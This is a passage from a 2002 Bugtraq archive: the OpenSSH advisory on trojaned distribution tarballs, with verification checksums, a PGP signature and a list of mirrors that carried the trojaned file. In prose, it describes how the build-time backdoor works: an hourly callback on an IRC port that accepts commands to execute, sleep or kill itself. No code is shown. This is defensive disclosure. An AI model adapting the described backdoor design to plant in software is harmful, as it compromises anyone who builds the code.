moot. But the fact that the portable versions were also trojaned, combined with the appearance that the trojaning occurred _on the FTP server and not on any development machines_, I think allows one to reasonably assume that the tarballs are being used. This last point may not be the case, we will have to wait for more information to come out.) (8802039) /Jim Breton <jamesb-bugtraq@alongtheway.com>/(Ombruten) 8800840 2002-08-01 11:18 -0400 /54 rader/ Niels Provos <provos@citi.umich.edu> Sänt av: joel@lysator.liu.se Importerad: 2002-08-01 18:35 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <23433> Ärende: OpenSSH Security Advisory: Trojaned Distribution Files ------------------------------------------------------------ From: Niels Provos <provos@citi.umich.edu> To: bugtraq@securityfocus.com Message-ID: <20020801151812.GE6925@citi.citi.umich.edu> OpenSSH Security Advisory (adv.trojan) 1. Systems affected: OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the OpenBSD ftp server and potentially propagated via the normal mirroring process to other ftp servers. The code was inserted some time between the 30th and 31th of July. We replaced the trojaned files with their originals at 7AM MDT, August 1st. 2. Impact: Anyone who has installed OpenSSH from the OpenBSD ftp server or any mirror within that time frame should consider his system compromised. The trojan allows the attacker to gain control of the system as the user compiling the binary. Arbitrary commands can be executed. 3. Solution: Verify that you did not build a trojaned version of the sources. The portable SSH tar balls contain PGP signatures that should be verified before installation. You can also use the following MD5 checksums for verification. MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01 MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a 4. Details When building the OpenSSH binaries, the trojan resides in bf-test.c and causes code to execute which connects to a specified IP address. The destination port is normally used by the IRC protocol. A connection attempt is made once an hour. If the connection is successful, arbitrary commands may be executed. Three commands are understood by the backdoor: Command A: Kill the exploit. Command D: Execute a command. Command M: Go to sleep. 5. Notice: Because of the urgency of this issue, the advisory may not be complete. Updates will be posted to the OpenSSH web pages if necessary. (8800840) /Niels Provos <provos@citi.umich.edu>/---- Bilaga (application/pgp-signature) i text 8800841 8800841 2002-08-01 11:18 -0400 /13 rader/ Niels Provos <provos@citi.umich.edu> Importerad: 2002-08-01 18:35 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <23434> Bilaga (text/plain) till text 8800840 Ärende: Bilaga till: OpenSSH Security Advisory: Trojaned Distribution Files ------------------------------------------------------------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (OpenBSD) Comment: For info see http://www.gnupg.org iQEVAwUBPUlRNDZ8FqYKL4flAQHVQQgAi88o43SftqLHXvkn/J0yKYjKsNf42yoB KXfLrFDD7DeYFNnXUol5XLVvjEpEkmSPIh/fXNXptkM8J7MXFcOMpzu0rb+3PMAo K73r0MePJ++4SzYD4Qn0yz7TOGpaMHVfK1lUx6sHUx50yRYp6Mmt4f5vZenhGvOF REhcsvaNBBGHyHo7dnqIy+viupR4QkaeZ0aeIgbSoQhilYclzw5MwK2PwK/9MV1r RuL1UAhA2oG0nlM0f9fYcI5iWDuMDq5XC+oqWXOJ0ivMyyoQeL7Mh4IIm1wNV55Q f2eThXAVPkC+d1KifUJOa01DUwxwHYIwdnaEaEUUCde37JGsnAvWIg== =s0fY -----END PGP SIGNATURE----- (8800841) /Niels Provos <provos@citi.umich.edu>/---- 8801656 2002-08-01 19:56 +0300 /96 rader/ Tomi Nylund <wizard@university.in.oulu.fi.invalid> Sänt av: joel@lysator.liu.se Importerad: 2002-08-01 22:19 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Externa svar till: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <23446> Ärende: List of mirrors carrying trojaned OpenSSH ------------------------------------------------------------ From: Tomi Nylund <wizard@university.in.oulu.fi.invalid> To: bugtraq@securityfocus.com Message-ID: <3D496836.5C8D56D1@university.in.oulu.fi.invalid> Hello, my first post to the list. Cool.. :) Sorry for the horrible formatting: this was posted in haste using Netscape's Mail client :( Anyways, we did some research here at Oulu regarding the propagation of the trojaned OpenSSH-3.4p1.tar.gz, and found out the following: Trojaned mirrors: 3ac9bc346d736b4a51d676faa2a08a57 MD5 (./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.easynet.be/openssh/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.freenet.de/pub/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5 (./ftp.jaquet.dk/pub/openSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.stealth.net/pub/mirrors/ftp.openssh.com/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.uninett.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.volftp.mondadori.com/mirror/openbsd/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./hal.csd.auth.gr/mirrors/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.csie.nctu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= 3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)= The list was taken from http://www.openssh.com/portable.html, it does NOT contain all the mirrors out there, just the primary ones, I guess.. The list was taken around 1700 hours EEST. Also, it should be apparent that NOTHING from ftp.openbsd.org should be trusted until their sysadmins have done full damage assesment. Also, some people have debated on the severity of opening a shell to some remote location. Please note, that any commands may be ran over such connection, perhaps patching the OpenSSH source code a bit further, or dropping a platform-specific rootkit to the victim's system: the author had gone to great lengths to make the code as portable as possible. My e-mail address is obfuscated to repel spammers, however, if you wish to contact me or any other members of our group, you'll find our contact detail from our web pages. Regards, Tomi --------------Tomi Nylund, Research Scientist, OUSPG---------------- Group info & contact details at http://www.ee.oulu.fi/research/ouspg PGP key: http://www.ee.oulu.fi/research/ouspg/ouspg-key.asc Key fingerprint = B2 F7 97 09 F5 4C 29 97 9A A8 2D FB 59 CA 10 C4 -------------Oulu University Secure Programming Group--------------- (8801656) /Tomi Nylund <wizard@university.in.oulu.fi.invalid>/(Ombruten)